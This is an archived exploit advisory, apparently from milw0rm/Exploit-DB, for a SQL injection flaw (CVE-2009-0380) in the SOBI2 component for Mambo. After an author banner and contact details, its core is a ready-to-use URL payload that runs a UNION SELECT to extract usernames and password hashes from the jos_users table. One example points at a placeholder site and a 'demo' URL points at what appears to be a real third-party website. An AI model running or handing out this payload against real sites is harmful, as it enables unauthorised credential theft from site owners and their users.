Mambo Component SOBI2 RC 2.8.2 - SQL Injection

Author: Br1ght D@rk
type: webapps
platform: php
port: 
date_added: 2009-01-20 
date_updated: 2017-01-18 
verified: 1 
codes: OSVDB-51795;CVE-2009-0380 
tags: 
aliases:  
screenshot_url:  
application_url: 

                          ||          ||   | ||
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                  ( :   /    (_)    /           (   .

      +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
      |                                                           |
      |                   GaZa WiLL NeVeR DiE                     |
      |       		                                          |
      |                                                           |
      |         Proud To Be A MusLiM , Proud To Be A EgYpTiaN     |
      |                                                           |
      +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+


<<!>> Found by  :  Br1ght D@rk

<<!>> C0ntact : MiDo2005_2010 [at] hotmail.com

<<!>> Groups : EgY C0D3RS TeaM , SeCuRiTy G33KS

=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================


<<->> D0rk    : find it

<<->> Exploit :>>>

              :>>>  http://www.site.co.il/index.php?option=com_sobi2&task=showbiz&bid=-78+union+select+0,concat(username,0x3a3a,password),0+from+jos_users--

<<->>  DeM00  :>>>  http://www.karmel.co.il/index.php?option=com_sobi2&task=showbiz&bid=-78+union+select+1,concat(username,0x3a3a,password),3+from+jos_users--

=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================

<<->> All freinds , all muslims , Egy C0ders , AsbMay Group,sec-geeks.com

                                  <--[ sec-geeks.com ]-->

# milw0rm.com [2009-01-21]